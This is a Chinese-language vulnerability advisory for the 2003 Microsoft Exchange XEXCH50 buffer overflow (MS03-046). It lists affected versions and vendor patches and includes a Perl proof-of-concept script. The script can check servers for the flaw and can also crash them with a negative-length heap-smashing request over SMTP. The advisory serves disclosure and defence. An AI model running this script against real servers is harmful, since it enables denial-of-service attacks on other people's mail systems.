|
|
Microsoft Exchange Server远程缓冲区溢出漏洞
发布时间:2003-10-15
更新时间:2003-10-22
严重程度:高
威胁程度:远程管理员权限
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8838
CVE(CAN) ID:CAN-2003-0714
受影响系统Microsoft Exchange Server 5.5 SP4
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP3
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP2
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5 SP1
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 5.5
-Microsoft BackOffice 4.5
-Microsoft Windows 2000 Workstation
-Microsoft Windows 2000 Workstation SP1
-Microsoft Windows 2000 Workstation SP2
-Microsoft Windows NT 4.0
-Microsoft Windows NT 4.0 SP1
-Microsoft Windows NT 4.0 SP2
-Microsoft Windows NT 4.0 SP3
-Microsoft Windows NT 4.0 SP4
-Microsoft Windows NT 4.0 SP5
-Microsoft Windows NT 4.0 SP6
-Microsoft Windows NT 4.0 SP6a
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
Microsoft Exchange Server 2000 SP1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
Microsoft Exchange Server 2000
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2 详细描述
Microsoft Exchange Server实现上存在一个可远程利用的缓冲区溢出漏洞,由于对XEXCH50关键字的处理有问题,远程非认证的客户端可以利用此漏洞引发溢出的发生,在Exchange 2000可能利用此漏洞 执行任意指令,在Exchange Server 5.5上可能造成拒绝服务攻击。
测试代码
#!/usr/bin/perl -w
##################
##
# ms03-046.pl - hdm[at]metasploit.com
##
use strict;
use IO::Socket;
my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;
if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();
sub check
{
my $s = SMTP($host, $port);
if (! $s)
{
print "[*] Error establishing connection to SMTP service.\n";
exit(0);
}
print $s "XEXCH50 2 2\r\n";
my $res = <$s>;
close ($s);
# a patched server only allows XEXCH50 after NTLM authentication
if ($res =~ /authentication/i)
{
print "[*] This server has been patched or is not vulnerable.\n";
exit(0);
}
print "[*] This system is vulnerable: $host:$port\n";
exit(0);
}
sub crash
{
my $s = SMTP($host, $port);
if (! $s)
{
print "[*] Error establishing connection to SMTP service.\n";
exit(0);
}
# the negative value allows us to overwrite random heap bits
print $s "XEXCH50 -1 2\r\n";
my $res = <$s>;
# a patched server only allows XEXCH50 after NTLM authentication
if ($res =~ /authentication/i)
{
print "[*] This server has been patched or is not vulnerable.\n";
exit(0);
}
print "[*] Sending massive heap-smashing string...\n";
print $s ("META" x 16384);
# sometimes a second connection is required to trigger the crash
$s = SMTP($host, $port);
exit(0);
}
sub usage
{
print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
exit(0);
}
sub SMTP
{
my ($host, $port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) || return(undef);
my $r = <$s>;
return undef if !$r;
if ($r !~ /Microsoft/)
{
chomp($r);
print STDERR "[*] This does not look like an exchange server: $r\n";
return(undef);
}
print $s "HELO X\r\n";
$r = <$s>;
return undef if !$r;
print $s "MAIL FROM: DoS\r\n";
$r = <$s>;
return undef if !$r;
print $s "RCPT TO: Administrator\r\n";
$r = <$s>;
return undef if !$r;
return($s);
}
解决方案
厂商已经提供了补丁:
Microsoft Exchange Server 2000 SP3:
Microsoft Patch Security Update for Exchange 2000 (KB829436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=7BAF5394-1B4E-4937-A570-9F232AE49F01&displaylang=en
Microsoft Exchange Server 5.5 SP4:
Microsoft Patch Security Update for Exchange 5.5 (KB829436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=A9E872EA-54B0-4179-8AE9-5648BFB46459&displaylang=en
相关信息
CA-2003-27: Multiple Vulnerabilities in Microsoft Windows and Exchange
http://www.cert.org/advisories/CA-2003-27.html
Microsoft Security Bulletin MS03-046
http://www.microsoft.com/technet/security/bulletin/MS03-046.asp
|
